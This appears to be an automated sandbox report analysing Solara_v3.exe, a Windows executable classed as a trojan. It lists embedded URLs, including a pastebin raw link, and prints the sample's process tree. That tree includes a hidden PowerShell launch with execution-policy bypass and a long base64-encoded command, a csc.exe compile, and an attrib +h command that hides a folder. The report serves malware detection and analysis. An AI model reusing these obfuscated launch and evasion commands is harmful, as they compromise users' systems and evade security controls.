    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/beatgammit/base64-js
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/beatgammit/base64-js/issues/42
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch/blob/master/src/headers.js
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/2b56fb0c7a07108e5b54241e8faec160d393aedb/index.js
    Source: Solara_v3.exeString found in binary or memory: https://github.com/clap-rs/clap/issues
    Source: Solara_v3.exeString found in binary or memory: https://github.com/clap-rs/clap/issuesH9
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmp, Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/clap-rs/clap/issuesH9b
    Source: Solara_v3.exeString found in binary or memory: https://github.com/ctz/webpki-roots
    Source: Solara_v3.exeString found in binary or memory: https://github.com/denoland/deno/issues
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/issues/4591)
    Source: Solara_v3.exeString found in binary or memory: https://github.com/denoland/deno/releases
    Source: Solara_v3.exeString found in binary or memory: https://github.com/denoland/deno/tree/master/test_plugin
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/github/fetch/blob/master/fetch.js
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/golang/go/blob/master/LICENSE
    Source: Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inexorabletash/text-encoding
    Source: Solara_v3.exeString found in binary or memory: https://github.com/v8/v8/blob/24886f2d1c565287d33d71e4109a53bf0b54b75c/LICENSE.v8
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vadimg/js_bintrees.
    Source: powershell.exe, 00000002.00000002.1714210124.00000141E49A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: Solara_v3.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer).
    Source: Solara_v3.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer.Grow).
    Source: Solara_v3.exeString found in binary or memory: https://golang.org/pkg/bytes/#Buffer.ReadFrom).
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://golang.org/pkg/io/#pkg-constants
    Source: Solara_v3.exeString found in binary or memory: https://myserver.com
    Source: Solara_v3.exeString found in binary or memory: https://no-color.org/
    Source: powershell.exe, 00000002.00000002.1732463624.00000141F3F25000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1732463624.00000141F3DE3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: Solara_v3.exe, 00000000.00000003.1750185198.0000009508082000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/RsTRUBeb
    Source: Solara_v3.exe, 00000000.00000003.1749303648.00000203FC668000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/RsTRUBeb):
    Source: Solara_v3.exeString found in binary or memory: https://some/file.ts
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://streams.spec.whatwg.org/
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1673730597.0000009508182000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749869144.0000009508182000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2046#section-5.1
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#idna
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#port-state
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://url.spec.whatwg.org/#special-scheme
    Source: Solara_v3.exeString found in binary or memory: https://v8.dev/docs/stack-trace-api#stack-trace-collection-for-custom-exceptions.
    Source: Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749823218.0000009508102000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://w3c.github.io/FileAPI/
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-descriptor
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permission-registry
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#permissionstatus
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/permissions/#status-of-a-permission
    Source: Solara_v3.exeString found in binary or memory: https://w3c.github.io/user-timing)
    Source: Solara_v3.exeString found in binary or memory: https://wicg.github.io/import-maps/
    Source: Solara_v3.exeString found in binary or memory: https://www.catcert.net/verarrel
    Source: Solara_v3.exeString found in binary or memory: https://www.iana.org/assignments/uri-schemes/uri-schemes.xhtml
    Source: Solara_v3.exeString found in binary or memory: https://www.npmjs.com/package/tslib).
    Source: Solara_v3.exe, 00000000.00000003.1673730597.00000095081C2000.00000004.00001000.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1674762766.00000203FDFAF000.00000004.00000020.00020000.00000000.sdmp, Solara_v3.exe, 00000000.00000003.1749944306.00000095081C2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.rapidtables.com/convert/color/hsl-to-rgb.html
    Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
    Source: C:\Users\user\Desktop\Solara_v3.exeFile created: C:\WindowsSystemJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7E3FFA2_2_00007FFD9B7E3FFA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7ED8052_2_00007FFD9B7ED805
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B7ED77C2_2_00007FFD9B7ED77C
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: Solara_v3.exe, 00000000.00000002.1753019926.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: Solara_v3.exeBinary or memory string: containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: Solara_v3.exeBinary or memory string: $containerKindoriginalTextSpanoriginalFileNameoriginalContextSpanstruct DefinitionInfostruct DefinitionInfo with 10 elements vs Solara_v3.exe
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: Commandline size = 3440
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: Commandline size = 3440Jump to behavior
    Source: Process Memory Space: powershell.exe PID: 7492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: classification engineClassification label: mal80.troj.expl.evad.winEXE@10/10@1/1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t10askbo.sgr.ps1Jump to behavior
    Source: Solara_v3.exe, 00000000.00000000.1671161029.00007FF6DE105000.00000002.00000001.01000000.00000003.sdmpMemory string: rustls::msgs::handshakeIllegal SNI hostname received
    Source: Solara_v3.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\Solara_v3.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: Solara_v3.exeString found in binary or memory: deno test src/v8-flags-help
    Source: Solara_v3.exeString found in binary or memory: deno test src/v8-flags-helpI
    Source: Solara_v3.exeString found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
    Source: Solara_v3.exeString found in binary or memory: Examples: https://github.com/WICG/import-maps#the-import-mapSet V8 command line options (for help: --v8-flags=--help)Watch for file changes and restart process automaticallyWatch for file changes and restart process automatically.
    Source: Solara_v3.exeString found in binary or memory: Multi-address mappings are not yet supported
    Source: Solara_v3.exeString found in binary or memory: For a list of V8 flags, use '--v8-flags=--help'
    Source: Solara_v3.exeString found in binary or memory: For a list of V8 flags, use '--v8-flags=--help'
    Source: Solara_v3.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
    Source: Solara_v3.exeString found in binary or memory: binauthoraboutlong-aboutall-argsunifiedpositionalssubcommandsafter-helpbefore-helpCould not decode tag nameunknown versionunknown authorunknown aboutunknown after-helpunknown before-help
    Source: Solara_v3.exeString found in binary or memory: USAGE:--help
    Source: Solara_v3.exeString found in binary or memory: USAGE:--help
    Source: Solara_v3.exeString found in binary or memory: :Madrid (see current address at www.camerfirma.com/address)1
    Source: Solara_v3.exeString found in binary or memory: Try --help for options
    Source: Solara_v3.exeString found in binary or memory: Try --help for options
    Source: Solara_v3.exeString found in binary or memory: timer-event-start
    Source: Solara_v3.exeString found in binary or memory: result%lldapicheck-securityshared-librarycurrent-timetimer-event-starttimer-event-endtimer-eventblockbuiltin_hashnewdeletecode-source-infoCOIFS
    Source: C:\Users\user\Desktop\Solara_v3.exeFile read: C:\Users\user\Desktop\Solara_v3.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\Solara_v3.exe "C:\Users\user\Desktop\Solara_v3.exe"
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAF
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\attrib.exe "attrib" +h C:\WindowsSystem
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHAGwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeProcess created: C:\Windows\System32\attrib.exe "attrib" +h C:\WindowsSystemJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py0wfw3n\py0wfw3n.cmdline"Jump to behavior
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A60.tmp" "c:\Users\user\AppData\Local\Temp\py0wfw3n\CSCB237945D4EF64F37AEB0937E3F152BA1.TMP"Jump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\Solara_v3.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
